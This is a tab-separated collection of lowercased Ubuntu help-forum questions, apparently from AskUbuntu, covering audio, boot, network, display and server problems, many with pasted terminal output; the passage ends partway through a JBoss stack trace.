455278	no sound with external mic configuration on ubuntu 12.04 lts	i use ubuntu 12.04 lts on dell inspiron 5521 i7 i have an issue detecting external mic . i have searched multiple forums and i was unable to find a suitable answer . my system does not detect an input in sounds- > input tab it only detects built-in audio . i have my sound drivers installed too . i have no idea how to get my external mic working . it 's not with a headphone it is a separate mic . kindly help me out . thank you
455284	how to connect two computers using ethernet cable in ubuntu ?	i want to connect two computers using ethernet cable in ubuntu ( both systems are in ubuntu ) and to share a printer which is installed in first computer.no internet connection in both computers .
455286	ubuntu 14.04 efi partition error on asrock 970 extreme3 2.0 mobo ?	hi i just bought 3 computers ( asrock 970 extreme pro 3 mobo ) for work , and they are all exactly the same except one has a bigger hard drive . so i just installed ubuntu 14.04 on one of them , and it told me i needed an efi partition . but then i installed on another one , and it did not tell me i needed the partition . ok update : i found the csm setting under advanced - > acpi , but no love , first of all it said not to change it , and then it threw an error , told me my vid card did n't support uefi , or something , sorry not clear about that . but it worked after that , just no request for the efi partition . anyway i installed again , after hitting f11 to choose boot order , and specifically choosing the uefi usb device rather than the normal one ( installing with bootable usb ) . i will try to figure this out when i install the 3rd comp and check the settings on the other one . the tech guy was just checking stuff out , but he toggled around so quickly i did n't pick up what he did , i thought he did activate something though on one comp . will compare settings soon . if anyone cares , sound , internet , all cool out of the box . i am not going to do dual boot so this is n't a big deal for me .
455289	aten saving and export , import problem	i have downloaded aten-1.8 and compiled and executed it in ubuntu 13.1 . but when running window opens and gives me the following message : filters could not be found . no import/export will be possible . set the environment variable atendata to point to aten 's data directory ( e.g . 'export atendata=/usr/local/aten/data ' ) , or run with -- atendata . i did set environment variable atendata to point to aten 's data directory , but same problem remains . what should i do ?
455290	control volume of pulse audio from command	i load the modle-loopback for logitech mic and bluetooth device using the sinks . after doing that now i am hear the audio from both but the audio coming from devices is very high . so is there any way to control the audio of this devices from command prompt ?
455291	flash player issue in chromium in ubuntu 14.04	i needed to download youtube videos and it asked to download plugin from java website . adobe flash player is required to display some elements on this page . install plug-in . i downloaded this . jre-7u55-linux-x64.tar.gz but i do n't know how to install it . please tell me how to install it or tell me if there is any fix for this .
455294	problems with rs232 cable and the communication	let me start out by saying that i hope this is the right place to ask . my problem is not purely defined yet and i am hoping you can help me shed some light on what is going wrong . so , the deal is that for my electronics exam project my group and i have made an ecg mainly to monitor the heart rate . we would then like to take the data we get and send it to the computer and from there draw a graph of the actual ecg . the electronics board and that are working perfectly . we take our heart rate frequency and put it through and ad-converter ( written in assembler ) . after that we take the output signal through an optocoupler and from there to our rs232 cable and into the computer . i believe that i have correctly installed the vcp drivers from ftdi . when i say i believe it is because i followed the installation instructions and all went well however when i try the example i get an error : casper @ casper-thinkpad-l530 : ~/downloads/release/examples $ make -b for n in bitmode eeprom/erase eeprom/read eeprom/write eeprom/user/read eeprom/user/size eeprom/user/write events largeread multithread setvidpid simple timeouts ; do make -c $ n || exit 1 ; done make [ 1 ] : entering directory `/home/casper/downloads/release/examples/bitmode' gcc main.c -o bitmode -wall -wextra -l. -lftd2xx -wl , -rpath /usr/local/lib /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `initcheckdevice ' : ftd2xx.c : ( .text+0x315 ) : undefined reference to `dlopen' ftd2xx.c : ( .text+0x33b ) : undefined reference to `dlopen' ftd2xx.c : ( .text+0x378 ) : undefined reference to `dlsym' ftd2xx.c : ( .text+0x383 ) : undefined reference to `dlerror' /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `my_init ' : ftd2xx.c : ( .text+0x44c ) : undefined reference to `dlclose' ftd2xx.c : ( .text+0x488 ) : undefined reference to `pthread_create' /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `my_fini ' : ftd2xx.c : ( .text+0x4cd ) : undefined reference to `pthread_join' /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `devicematch ' : ftd2xx.c : ( .text+0x537 ) : undefined reference to `dlclose' /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `ftcommonopen ' : ftd2xx.c : ( .text+0x229c ) : undefined reference to `pthread_create' ftd2xx.c : ( .text+0x22dd ) : undefined reference to `pthread_create' ftd2xx.c : ( .text+0x232b ) : undefined reference to `pthread_create' /usr/local/lib/libftd2xx.a ( ftd2xx.o ) : in function `ft_close ' : ftd2xx.c : ( .text+0x2630 ) : undefined reference to `pthread_join' ftd2xx.c : ( .text+0x2670 ) : undefined reference to `pthread_join' ftd2xx.c : ( .text+0x26dd ) : undefined reference to `pthread_join' /usr/local/lib/libftd2xx.a ( io.o ) : in function `libusb_try_lock_events ' : io.c : ( .text+0x8d5 ) : undefined reference to `pthread_mutex_trylock' /usr/local/lib/libftd2xx.a ( linux_usbfs.o ) : in function `find_monotonic_clock ' : linux_usbfs.c : ( .text+0x180 ) : undefined reference to `clock_gettime' /usr/local/lib/libftd2xx.a ( linux_usbfs.o ) : in function `op_clock_gettime ' : linux_usbfs.c : ( .text+0x323b ) : undefined reference to `clock_gettime' linux_usbfs.c : ( .text+0x3250 ) : undefined reference to `clock_gettime' collect2 : ld returned 1 exit status make [ 1 ] : *** [ bitmode ] error 1 make [ 1 ] : leaving directory `/home/casper/downloads/release/examples/bitmode' make : *** [ subdirs ] error 1 this is my first issue , i am not sure how to fully check out whether or not the driver is actually working . i can see the cable perfectly when executing : casper @ casper-thinkpad-l530 : ~/downloads/release/examples $ ls -h /dev/*tty* i can find : /dev/ttyusb0 but something tells me that this is not the virtual com port is should be in order for the rs232 protocol to work . which leads to my second problem . this is probably only a problem because of the above but nonetheless : i am just starting to use pyserial to work with the cable but i cant seem to get the grasp of how to do this . when executing the following : import serial ser = serial.serial ( '/dev/ttyusb0 ' , timeout=10 ) x = ser.read ( ) print x ser.close ( ) the shell just hangs , as if no bytes are received , after the 10 second timeout , it closes . i know for a fact that i am sending a signal through the cable as i am able to see the result on the oscilloscope . if you need any more information or pictures of anything please do not hesitate to ask , i will gladly provide you with what you need . looking forward to hearing from you , best regards ! edit : while digging through more of the pyserial documentation i tried the following : import serial import io ser = serial.serial ( '/dev/ttyusb0 ' , timeout=1 ) ser.baudrate = 19200 print ser ser.close ( ) and get the result : serial < id=0x98dad6c , open=true > ( port='/dev/ttyusb0 ' , baudrate=19200 , bytesize=8 , parity='n ' , stopbits=1 , timeout=1 , xonxoff=false , rtscts=false , dsrdtr=false ) i also tried : casper @ casper-thinkpad-l530 : ~ $ python -m serial.tools.list_ports regexp and get : filtered list with regexp : 'regexp' no ports found hope this helps anything ?
455296	installation problem with boot screen flickering ?	i was trying to install ubuntu 14.04 on my compaq presario laptop using a dvd . while doing so , ^ [ { 5^^ ^ [ { 5^^ ^ [ { 5^^ ^ [ { 5^^ ^ [ { 5^^ ^ [ { 5^^ ( many times ) appeared on screen . and after that , screen started flickering . i was not able to understand this wikipedia article on screen flickering . to resolve this , i read this tldp.org article . but , i did not understand it too . therefore , i am here for help from readers of this question .
455297	ubuntu failed to install for the 2nd time	i am trying to install ubuntu 12.04 32bit on an older toshiba satellite pro 4600 with pentium 3 processor 897mhz , and 512mb ram . i wrote/copied the .iso file to a disk . it seems like the files are there , but when i booted from disk and replaced microsoft windows xp all going well at first , then the installation stalls on copying files dialog , which looks completed . the last screen is installation . which is shown like this for 2 hours , with no mouse movement ; appears to be frozen . last night was my last attempt ended with blank screen . multiple attempts to restart only blank screen with blinking .
455300	formatted pc by mistake	i have windows installed on my pc . i have tried to install ubuntu 14.04 , but unfortunately instead of creating a new partition , i chose the first option `` erase everything '' . i canceled it , but when i restart my pc , no operating system appears . could you please help me ?
455301	how to restart gnome-shell , after it became unresponsive/freeze ?	i use ubuntu gnome 14.04 . sometimes , my gnome-shell freezes . i can see ( hear ) background processes working ( playing music ) , but i ca n't do anything in gnome . no alt+f2+r . i can switch to console using : ctrl+alt+f1 , login as the same user and execute : gnome-shell -- replace and return back ctrl+f7 , but then , i get a strange behavior . for example i can not edit network connections . i can not logout as well . what is the proper way to restart the gnome-shell ?
455303	usb network adapter blacklisted by asix	i 'm tyring to install my sitecom ln-028 in ubuntu server 14.04 lts . after compiling the driver , i added the vendor id and de product id to asix 's new_id . when i connect the device , dmesg tells me that the device is blacklisted by asix . how can i remove it from this blacklist ?
455306	mouse slow proportionally to network usage	under any network loading the logitech mouse gets slow . at download speeds of as low as 50kb/s , clicks are `` grabby , '' a click will pick up an object and any movement will move it around . at rates above 150kb/s , the mouse barely moves . network loading from web browsing and torrent downloads affect the mouse , i have n't looked into it any further then that . computer : amd phenom 8450 ( tri-core @ 2 ghz ) ram : 6 gb dual monitors ( hd tv using hdmi , and a dell monitor ( portrait mode ) on analog . logitech wireless mouse/keyboard ( using default/automatic ubuntu driver ) ( microsoft usb mouse ) fast ethernet connection the wireless keyboard does not appear to be affected . repeatable on 13.10 and 14.04 ( desktop ) . interestingly , when i add the microsoft usb mouse , that mouse works fine . in fact , that logitech mouse intermittently may work better ( or not ) when the second mouse is plugged in .
455307	how to get back unity webapps to firefox integration ?	i ca n't believe that there was not a question or open issue for this before . i 've recently installed ubuntu 14.04 along with my favourite webapps ; and i , unfortunately , realised that they 're not integrated with firefox/chromium anymore . instead , they use a minimal browser which i am not interested in . within the few reasons why i 'm still using unity and i have n't moved to gnome or xfce , it 's the unity-webapps . i have n't known any other os or desktop environment ( de ) which integrates the internet webapps in the computer and , at same time , keeps the power of the web-browser and the computer-using style . i loved to be able to have tens of opened tabs & to be in one-click far away to my facebook tab . and i loved to create new tabs in the same windows that i used to have my open webapp . no mention of all the capabilities which firefox provides me ... so , is there any workaround to get back the unity-webapps integrated in firefox/chromium ? i 've already checked the system settings and the unity tweak tool with no luck . the major issue of the unity-webapps was there are few of them , they need more features and more stability . if ubuntu does n't fix this , i 'll strongly think in moving to another de . c'mon canonical , i 'm not using a tablet , i have got 6gb of ram and i want to see many apps and many pages at the same time . edit - i have reported a bug in launchpad for this issue : https : //bugs.launchpad.net/libunity-webapps/+bug/1329046 edit - my proposal of solution : the solution might be archieved following the path i 'm describing below . i can only show it , somebody has to walk through it . get the source for 14.04 unity-webapps edit the place where webapp-browser is changed to be by default for unity-webapps inside libunity-webapps . compile again the code for 14.04 and post the output package here . the source for libunity is hosted here : http : //packages.ubuntu.com/source/trusty/libunity-webapps
455308	how to configure the display settings ?	how to configure the display settings ? i tried to follow these instructions : [ https : //wiki.ubuntu.com/x/config/resolution ] [ 1 ] > $ cvt 1920 1080 60.00 > # 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 > 1088 1120 -hsync +vsync $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 141 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 my primary lcd laptop monitor is disconnected and i use only the second one to watch on .
455310	ubuntu 14.04 lts will not go past grub2 menu	i have a hp pro 3130 mt and just did a fresh install of unbuntu 14.04 64-bit . when i restart , instead of getting a ubuntu logo or going to the login page , the os takes me to the grub2 screen that has the `` advanced options '' but the astrick ( * ) is next to ubuntu . i do n't understand why i am not getting a normal boot to the login screen . i figured i might be having graphics problems so i try to boot into recovery mode using the advanced options but after i select recovery mode and hit enter , i never make it past the loading linux kernal text . i just get a frozen cursor underneath the text . here is the output of lspci -v : ubuntu @ ubuntu : ~ $ lspci -v 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 capabilities : kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 , irq 42 memory at fb800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at cc00 [ size=8 ] expansion rom at [ disabled ] capabilities : kernel driver in use : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 , irq 43 memory at fbdfbc00 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9c flags : bus master , medium devsel , latency 0 , irq 16 memory at fbdf8000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 , irq 44 memory at fbdf4000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fbe00000-fbefffff prefetchable memory behind bridge : 00000000faf00000-00000000faffffff capabilities : kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fbf00000-fbffffff prefetchable memory behind bridge : 00000000f0000000-00000000f01fffff capabilities : kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9c flags : bus master , medium devsel , latency 0 , irq 23 memory at fbdf2000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci-pci 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=32 capabilities : 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) subsystem : hewlett-packard company device 2a9c flags : bus master , medium devsel , latency 0 capabilities : kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : hewlett-packard company device 2a9c flags : bus master , 66mhz , medium devsel , latency 0 , irq 41 i/o ports at c880 [ size=8 ] i/o ports at c800 [ size=4 ] i/o ports at c480 [ size=8 ] i/o ports at c400 [ size=4 ] i/o ports at c080 [ size=32 ] memory at fbdf0000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : kernel driver in use : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) subsystem : hewlett-packard company device 2a9c flags : medium devsel , irq 10 memory at fbdfb800 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 0400 [ size=32 ] 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 , irq 40 i/o ports at d800 [ size=256 ] memory at fbeff000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at faffc000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at fbec0000 [ disabled ] [ size=128k ] capabilities : kernel driver in use : r8169 02:00.0 firewire ( ieee 1394 ) : via technologies , inc. vt6315 series firewire controller ( rev 01 ) ( prog-if 10 [ ohci ] ) subsystem : hewlett-packard company device 2a9c flags : bus master , fast devsel , latency 0 , irq 18 memory at fbfff800 ( 64-bit , non-prefetchable ) [ size=2k ] i/o ports at e800 [ size=256 ] capabilities : kernel driver in use : firewire_ohci ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ubuntu @ ubuntu : ~ $ so i changed the grub_cmdline_linux_default= '' quiet splash '' line in /etc/default/grub to grub_cmdline_linux_default= '' quiet splash nomodeset '' but that did n't work . so i changed it one more time to grub_cmdline_linux_default= '' quiet splash i915.modest=1 '' . but i am still unable to boot correctly . i am really confused because the live disk works just fine . i am really in need here and any help will be much appreciated . thank you very much ! , billy
455312	i need ubuntu one software for 14.04 , just once	we all know that , canonical shutting down ubuntu one . very recently i clean installed 14.04 lts . 14.04 is not supporting ubuntu one . i do n't know how to install ubuntu one in 14.04 . i googled but did n't get any solution . i saw same question here . but that answer is not solving my problem . because i have many backup files and many many sub-folders ( eg : edited kernel source ) . now i ca n't go to each and every folder and download . so i do n't have other choice i think . i have to install ubuntu one in 14.04 which will sync completely without any problems and headache . is there any way to install it ?
455313	if i convert my ubuntu into xen hypervizor , will i lose access to the bcache devices ?	i 'd like to test xen a little . for obvious reasons i can not do it under virtualbox ( or can i ? ) as i understand , xen works by changing the kernel , thus possibly interfering with the custom kernel modules i have , namely with bcache . i 'd appreciate an information , whether after doing sudo apt-get install xen-system-amd64 qemu-common qemu-keymaps bridge-utils and then rebooting , will the system load the bcache module , as it does without xen ? i have no possibility to back up my 12+ tb raid array , so i ca n't test it myself .
455314	how can i change or modify compiz settings from within other user account ?	while i was playing with opacity window settings in compiz , i set all windows to complete transparent , so i can not see anything on the screen . i logged in to another user account . would anybody tell me how to find opacity settings in compiz and modify it from another user session ?
455315	ca n't access home folder	while installing matlab , i mistakenly typed sudo chmod +x ./java in the home folder . and i got i/o error that you are not allowed to access the home folder . suddenly everything in my home folder disappeared . although the disk shows filled up data . i guess the folder permission need to be changed .
455316	install iso file from network	i want to install ubuntu-10.04-linuxcnc3-i386.iso from network . with pxe method i can not choose the iso file which will be installed ! ! so how can i proceed to install the iso file using network card ?
455319	compiz put stopped working after upgrade	after upgrading my computer from 13.10 to 14.04 , the put plugin under compiz has stopped working . when i press < super > and an arrow on my number pad , it recognizes is as though i 'm trying to launch an application with < super > + [ 0-9 ] from the launcher . i 've tried with number lock on an off , but it does n't make a difference . what might have changed that 's causing this ?
455325	google chorme update is always 48mb	google chrome ships update almost every week , the size is mostly 48mb . questions is it the full updated chorme every week ? cannt google ship patches to updated like it does for windows ?
455326	how do i convert and 14.04 iso dvd to the installation disk ?	how do i convert my iso dvd of ubuntu 14.04 desktop 64 version to a dvd that will install the 14.04 ubuntu operating system ?
455327	unable to login to 14.04 after successful installation	after a successful upgrade to 14.04 , now when i am trying to login using administrator id , it loops back to login page and does n't load my session . even guest is not working . when i enter wrong password for administrator , it shows invalid password label . file name ~/.xsession-errors show below error xlib : extension `` glx '' missing on display `` :0 '' . script for ibus started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped please let me know what should i do .
455330	need help with getting nomachine working on ubuntu 14.04	iâm trying to get nomachine working on a aws ec2 instance with 14.04 trusty tahr . iâve used the instructions from : https : //help.ubuntu.com/community/nomachinenx https : //help.ubuntu.com/community/freenx http : //javadude.wordpress.com/2012/12/05/running-ubuntu-12-04-desktop-on-ec2/ when i try to connect from my mac using nomachine 4.2.21 , i get this error : the connection with the server was lost . error is 54 : connection reset by peer . when i use the opennx 0.16.0.729 client , i get a blank black screen . help .
455331	upgrade problems ( from ubuntu 13.10 to 14.04 )	i just upgraded my pc from ubuntu 13.10 to 14.04 . i followed each any every step , but after upgrading everything i clicked on the restart button to apply the changes , found myself stuck on a blank page saying : error : symbol 'grub_term_highlight_color ' not found . entering rescue mode ... grub rescue > i do n't know what 's going but i 'm sure i 'll get help from you guys . so please help me fix this problem .
455332	virtualbox shared folder : ubuntu 14.04 as guest , windows as host	i 'm stuck with connecting shared folder in ubuntu 14.04 as a host . i 've installed virtualbox-guest-additions-iso package but i still ca n't install guest additions from virtualbox itself ( this no headers found error ) and mount shared folder as mount -t vboxfs .. thanks .
455336	on-screen keyboard in ubuntu 14.04 lts ?	under microsoft windows 8 , our sony vaio tap 20 ( a touch-screen desktop computer ) automatically displays an on-screen keyboard if one touches a text field on-screen or there is otherwise no keyboard available ( for example , the included bluetooth keyboard is switched-off or flat ) ... there is also a ( notification area/system tray-based ) option to display or hide the on-screen keyboard on-demand . does such functionality exist under ubuntu 14.04 lts ( `` trusty tahr '' ) ? my understanding is that ubuntu 14.04 lts ( `` trusty tahr '' ) is supposed to be a mostly smartphone/tablet-focused upgrade ... but for the life of me , i can not find functionality that replicates that of windows 8 ( as described above ) ! i 've finally convinced the wife to let me single-boot ubuntu on our vaio tap 20 , but the included bluetooth keyboard smashes through batteries like they 're going out of fashion , so until we can buy a corded keyboard , we need a solution ( preferably built-in ) that replicates the functionality found under windows 8 ... -- never mind - all one needs to do after @ rmano 's solution is log-out and log back in ... i should also note that this was already installed under ubuntu 14.04 lts ( `` trusty tahr '' ) .
455338	`` ping : unknown host google.com '' but ip 's works fine	i recently upgraded from ubuntu 12.04 to ubuntu 14.04 . after restarting i have wifi connected and/or lan connection with no internet access . i 'm using toshiba satellite c855d . here are some of the terminal outputs : $ sudo lshw -c network *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : c0 : d9:62:8d:39:85 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.13.0-24-generic firmware=n/a ip=192.168.0.109 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:3000 ( size=256 ) memory : f0200000-f0203fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 05 serial : 00:8c : fa:49 : e0:4d size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f0104000-f0104fff memory : f0100000-f0103fff $ ifconfig -a eth0 link encap : ethernet hwaddr 00:8c : fa:49 : e0:4d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:727 errors:0 dropped:0 overruns:0 frame:0 tx packets:727 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:56993 ( 56.9 kb ) tx bytes:56993 ( 56.9 kb ) wlan0 link encap : ethernet hwaddr c0 : d9:62:8d:39:85 inet addr:192.168.0.109 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :c2d9:62ff : fe8d:3985/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1934 errors:0 dropped:0 overruns:0 frame:0 tx packets:61 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_seq=1 ttl=47 time=47.2 ms 64 bytes from 8.8.8.8 : icmp_seq=2 ttl=47 time=44.8 ms 64 bytes from 8.8.8.8 : icmp_seq=3 ttl=47 time=43.6 ms 64 bytes from 8.8.8.8 : icmp_seq=4 ttl=47 time=156 ms $ ping google.com ping : unknown host google.com $ nslookup google.com 8.8.8.8 server : 8.8.8.8 address : 8.8.8.8 # 53 non-authoritative answer : name : google.com address : 190.167.241.187 name : google.com address : 190.167.241.178 name : google.com address : 190.167.241.163 name : google.com address : 190.167.241.183 name : google.com address : 190.167.241.177 name : google.com address : 190.167.241.172 name : google.com address : 190.167.241.153 name : google.com address : 190.167.241.162 name : google.com address : 190.167.241.167 name : google.com address : 190.167.241.152 name : google.com address : 190.167.241.168 name : google.com address : 190.167.241.182 name : google.com address : 190.167.241.157 name : google.com address : 190.167.241.173 name : google.com address : 190.167.241.148 name : google.com address : 190.167.241.158 $ cat /etc/resolvconf/resolv.conf.d/head # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 8.8.8.8 $ sudo service networking restart stop : job failed while stopping start : job is already running : networking $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 00:8c : fa:49 : e0:4d capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off - device : wlan0 [ honey nut cheerios ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : c0 : d9:62:8d:39:85 capabilities : speed : 18 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *honey nut cheerios : infra , 00:21:29 : ef:11:2d , freq 2437 mhz , rate 54 mb/s , strength 78 wpa2 claro8ad : infra , 00:1a:2b : b0:69 : cd , freq 2462 mhz , rate 54 mb/s , strength 27 wpa2 clarob5f570 : infra , 88:25:2c : b5 : f5:70 , freq 2412 mhz , rate 54 mb/s , strength 20 wep wind30 : infra , 00:1f : fb:68 : e3:6c , freq 2427 mhz , rate 54 mb/s , strength 37 wpa dd-wrt_vap : infra , 02:1c:10:34:41:15 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa ipv4 settings : address : 192.168.0.109 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 8.8.8.8 dns : 8.8.4.4
455340	can not run jboss on ubnutu 12.04	i am trying to install jboss application server on ubuntu 12.04 . i am using vagrant . here is what i am getting : vagrant @ precise32 : /usr/share/jboss-as-7.1.1.final/bin $ ./standalone.sh -djboss.bind.address=0.0.0.0 ========================================================================= jboss bootstrap environment jboss_home : /usr/share/jboss-as-7.1.1.final java : java java_opts : -server -xx : +tieredcompilation -xms64m -xmx512m -xx : maxpermsize=25 6m -djava.net.preferipv4stack=true -dorg.jboss.resolver.warning=true -dsun.rmi.d gc.client.gcinterval=3600000 -dsun.rmi.dgc.server.gcinterval=3600000 -djboss.mod ules.system.pkgs=org.jboss.byteman -djava.awt.headless=true -djboss.server.defau lt.config=standalone.xml ========================================================================= unable to set property filename on class org.jboss.logmanager.handlers.filehandl er : java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl . java:39 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodacces sorimpl.java:25 ) at java.lang.reflect.method.invoke ( method.java:597 ) at org.jboss.logmanager.propertyconfigurator.configureproperties ( propert yconfigurator.java:187 ) at org.jboss.logmanager.propertyconfigurator.configurehandler ( propertyco nfigurator.java:312 ) at org.jboss.logmanager.propertyconfigurator.configure ( propertyconfigura tor.java:128 ) at org.jboss.logmanager.propertyconfigurator.configure ( propertyconfigura tor.java:86 ) at org.jboss.logmanager.logmanager.readconfiguration ( logmanager.java:246 ) at org.jboss.logmanager.logmanager.readconfiguration ( logmanager.java:231 ) at java.util.logging.logmanager $ 2.run ( logmanager.java:267 ) at java.util.logging.logmanager $ 2.run ( logmanager.java:265 ) at java.security.accesscontroller.doprivileged ( native method ) at java.util.logging.logmanager.readprimordialconfiguration ( logmanager.j ava:265 ) at java.util.logging.logmanager.getlogmanager ( logmanager.java:248 ) at java.util.logging.logger. < init > ( logger.java:225 ) at java.util.logging.logmanager $ rootlogger. < init > ( logmanager.java:1289 ) at java.util.logging.logmanager $ rootlogger. < init > ( logmanager.java:1287 ) at java.util.logging.logmanager $ 1.run ( logmanager.java:179 ) at java.security.accesscontroller.doprivileged ( native method ) at java.util.logging.logmanager. < clinit > ( logmanager.java:156 ) at 